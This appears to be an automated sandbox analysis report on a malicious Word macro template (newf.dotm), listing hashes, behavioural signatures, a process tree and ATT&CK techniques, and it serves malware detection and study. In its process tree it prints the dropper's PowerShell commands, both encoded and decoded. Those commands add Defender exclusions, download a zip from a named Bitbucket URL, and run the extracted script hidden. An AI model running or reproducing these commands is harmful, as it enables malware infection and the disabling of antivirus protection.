Analysis

  • max time kernel
    102s
  • max time network
    33s
  • platform
    windows7_x64
  • resource
    win7-20230220-en
  • resource tags

    arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
  • submitted
    18-04-2023 18:39

General

  • Target

    newf.dotm

  • Size

    17KB

  • MD5

    175722ba98f8f2715841c2c22026b7c8

  • SHA1

    23aab879b915d58e4f8eb8d1399d33963ce2ecb4

  • SHA256

    9969a0b62356c03aecf524ba69c136e675792b435eaf604c12dc5d36ed9c8aae

  • SHA512

    e1be8ad4704ac71e2afc7d53f7273942f13446cbf31bbf40b2afc308209522298d32be3bfb3011dce224b39e335c77985c462aa7488280dc229299296cf6d425

  • SSDEEP

    384:tmtriu1E3VPxAYwmhr9BiNiC78QyRC6hIm6akwLWdxdIZYB3S:q11gpxAYFhTiNV8QyRp2akw6LIOw

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://bitbucket.org/foxxlrep/repo/downloads/zip.zip

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\newf.dotm"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1336
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -e cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAGIAeQBwAGEAcwBzACAALQBuAG8AcAByAG8AZgBpAGwAZQAgAC0AdwBpAG4AZABvAHcAcwB0AHkAbABlACAAaABpAGQAZABlAG4AIAAtAGMAbwBtAG0AYQBuAGQAIAAiAE4AZQB3AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACcAQwA6AFwAXABUAGUAbQBwAFwAXAAnACAALQBJAHQAZQBtAFQAeQBwAGUAIABEAGkAcgBlAGMAdABvAHIAeQA7AEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAAnAEMAOgBcAFQAZQBtAHAAXAAnADsAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAJwA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBiAGkAdABiAHUAYwBrAGUAdAAuAG8AcgBnAC8AZgBvAHgAeABsAHIAZQBwAC8AcgBlAHAAbwAvAGQAbwB3AG4AbABvAGEAZABzAC8AegBpAHAALgB6AGkAcAAnACwAJwBDADoAXABcAFQAZQBtAHAAXABcAE4AZQB3AGYAaQBsAGUALgB6AGkAcAAnACkAOwBFAHgAcABhAG4AZAAtAEEAcgBjAGgAaQB2AGUAIAAtAFAAYQB0AGgAIAAnAEMAOgBcAFwAVABlAG0AcABcAFwATgBlAHcAZgBpAGwAZQAuAHoAaQBwACcAIAAtAEQAZQBzAHQAaQBuAGEAdABpAG8AbgBQAGEAdABoACAAJwBDADoAXABcAFQAZQBtAHAAXABcACcAIAAtAEYAbwByAGMAZQA7AFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAJwBDADoAXABcAFQAZQBtAHAAXABcAHMAYwByAGkAcAB0AC4AcABzADEAJwAiAA==
      2⤵
      • Process spawned unexpected child process
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:696
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -noprofile -windowstyle hidden -command "New-Item -Path 'C:\\Temp\\' -ItemType Directory;Add-MpPreference -ExclusionPath 'C:\Temp\';Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming';(New-Object System.Net.WebClient).DownloadFile('https://bitbucket.org/foxxlrep/repo/downloads/zip.zip','C:\\Temp\\Newfile.zip');Expand-Archive -Path 'C:\\Temp\\Newfile.zip' -DestinationPath 'C:\\Temp\\' -Force;Start-Process powershell.exe -ArgumentList 'C:\\Temp\\script.ps1'"
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1948
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\\Temp\\script.ps1
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1964
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2012

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Defense Evasion

    Modify Registry

    1
    T1112

    Command and Control

    Web Service

    1
    T1102

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm
      Filesize

      20KB

      MD5

      84039751734204f7fe2cc744b66210ce

      SHA1

      1bf55af0399ec4c8959fe2a67000d89d415929c4

      SHA256

      25ff77d9cda44b4c900583de94a1b67cca7d47c5da0d629445f469ae8810b319

      SHA512

      1990525c5f404d97234c0c2fbfa4a5113753adc355167032b0cfd8032a73aca1d949352022cc952bd1bca827b138b42ce5d774e260b0ca79b4df0670e2f6d283

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\VO2TU686GO3X41F8OS38.temp
      Filesize

      7KB

      MD5

      cafc8f0a4dca6bf154b0528b449a4b33

      SHA1

      ad665ecc4fcb9960a774a0989424d57e8789a6a8

      SHA256

      096b4a9cf30690e409cdd4e4ee879172adb9c6c38cecdd19e8037bcebee480fe

      SHA512

      f23f01bc2d5497b198ed71fb037e885f00e9275e3058e9c00f0247fcc1fd991bcd2e52177fc4b7c0ca2d88184b8ccde6a3e3b64c9c24b57083c66561ed85dc76

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
      Filesize

      7KB

      MD5

      cafc8f0a4dca6bf154b0528b449a4b33

      SHA1

      ad665ecc4fcb9960a774a0989424d57e8789a6a8

      SHA256

      096b4a9cf30690e409cdd4e4ee879172adb9c6c38cecdd19e8037bcebee480fe

      SHA512

      f23f01bc2d5497b198ed71fb037e885f00e9275e3058e9c00f0247fcc1fd991bcd2e52177fc4b7c0ca2d88184b8ccde6a3e3b64c9c24b57083c66561ed85dc76

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
      Filesize

      7KB

      MD5

      cafc8f0a4dca6bf154b0528b449a4b33

      SHA1

      ad665ecc4fcb9960a774a0989424d57e8789a6a8

      SHA256

      096b4a9cf30690e409cdd4e4ee879172adb9c6c38cecdd19e8037bcebee480fe

      SHA512

      f23f01bc2d5497b198ed71fb037e885f00e9275e3058e9c00f0247fcc1fd991bcd2e52177fc4b7c0ca2d88184b8ccde6a3e3b64c9c24b57083c66561ed85dc76

    • memory/696-67-0x0000000002710000-0x0000000002750000-memory.dmp
      Filesize

      256KB

    • memory/696-68-0x0000000002710000-0x0000000002750000-memory.dmp
      Filesize

      256KB

    • memory/1336-59-0x0000000000280000-0x0000000000380000-memory.dmp
      Filesize

      1024KB

    • memory/1336-61-0x0000000000280000-0x0000000000380000-memory.dmp
      Filesize

      1024KB

    • memory/1336-62-0x0000000000280000-0x0000000000380000-memory.dmp
      Filesize

      1024KB

    • memory/1336-54-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/1336-60-0x0000000000280000-0x0000000000380000-memory.dmp
      Filesize

      1024KB

    • memory/1336-57-0x0000000000280000-0x0000000000380000-memory.dmp
      Filesize

      1024KB

    • memory/1336-58-0x0000000000280000-0x0000000000380000-memory.dmp
      Filesize

      1024KB

    • memory/1336-105-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/1948-74-0x00000000050F0000-0x0000000005142000-memory.dmp
      Filesize

      328KB

    • memory/1948-75-0x00000000022E0000-0x0000000002320000-memory.dmp
      Filesize

      256KB

    • memory/1948-76-0x00000000022E0000-0x0000000002320000-memory.dmp
      Filesize

      256KB

    • memory/1964-87-0x0000000000780000-0x00000000007C0000-memory.dmp
      Filesize

      256KB

    • memory/1964-86-0x0000000000780000-0x00000000007C0000-memory.dmp
      Filesize

      256KB